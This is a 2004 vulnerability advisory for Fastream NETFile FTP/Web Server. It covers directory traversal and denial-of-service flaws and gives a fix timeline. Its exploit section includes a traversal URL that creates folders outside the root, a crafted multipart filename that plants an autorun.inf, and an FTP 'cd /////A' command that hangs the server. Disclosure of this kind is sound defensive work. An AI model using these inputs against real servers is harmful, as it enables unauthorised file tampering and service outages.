Fastream NETFile FTP/Web Server Input validation Errors
--------------------------------------------------------

Release Date: 4 July 2004

Severity: High

Systems Affected: Fastream NETFile FTP/Web Server <=v.6.7.2.1085

Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3

Vendor URL: http://www.fastream.com/netfileserver.htm

Original Advisory: http://www.haxorcitos.com/Fastream_advisory.txt

Author: Andres Tarasco Acuna
email:  at4r @ haxorcitos.com
WEB:  www.haxorcitos.com







------------------
1. Description
------------------

Vendor's Description:

"Fastream NETFile Server is a secure FTP server and Web server combined
together
in one application. Our claim is that it is the easiest to setup and use
server
on the Internet!"
"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links,
quotas, U/D ratio and extremely fast directory and file caches. Besides
being a
fast FTP server with full user and group based permissions and file and
directory
 cache, NETFile Server is also a Web server that is developed for sharing
files.

Fastream NETFile Web Server is a web server with full HTTP 1.1 compatibility
with
 support for multi-part downloads and keep-alive connections."









-------------------
2. Vulnerability
-------------------

There are some input validation errors in Fastream Netfile that allow users
to
bypass the root directory restrictions.
Due to the fact that Fastream Netfile allow remote users to
upload/create/delete
 files in the application directory, its easy to exploit this vulnerability
and
compromise the system.
Another vulnerability was reported, in the  way that Netfile handles some
Urls.
After requestin a special crafted directory it's possible to cause a 1
minute
Denial of Service.







-------------------
3. Exploit code
-------------------

The problem is in the way that Netfile handles two Slashes.
example URL:

http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY


C:\>dir FOLDE*
 Volume in drive C is W2000P
 Volume Serial Number is xxxx-xxxx

 Directory of C:\

07/03/2004  07:47p      <DIR>          FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
               0 File(s)              0 bytes
               1 Dir(s)     119,015,936 bytes free


Netfile allows some other methods in the "command" parameter, that could be
used to
create/delete folders/files outside the Root directory.



To exploit the upload files vulnerability we need to take a look to the data
sent
in the POST request:


-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain

THIS IS AN EXAMPLE

-----------------------------7d42c98700ea--

Its possible for an attacker to modify the filename parameter to something
like:
Filename="//..//autorun.inf" and place malicious files in the system, or
overwrite
existing files.



Seems that the FTP Server is not vulnerable to this issue and transversal
directory
attacks are not possible, but there is another bug that allows malicious
users to cause
a denial of service by executing the following command:

D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>





-----------------
4. Solution:
-----------------


The best solution is to upgrade the software to version 6.7.3 that was
released by
vendor 3 july 2004.
Another way to minimize the impact of this vulnerability is to store the
root
directory of Fastream netfile server in other partition and remove
create/delete file
and directory permissions from all users, included Guest accounts.



-------------------
5. Timeline
-------------------



DISCLOSURE TIMELINE:
-3 July, 2004: Vendor Contacted.
-3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
-4 July, 2004: Public Disclosure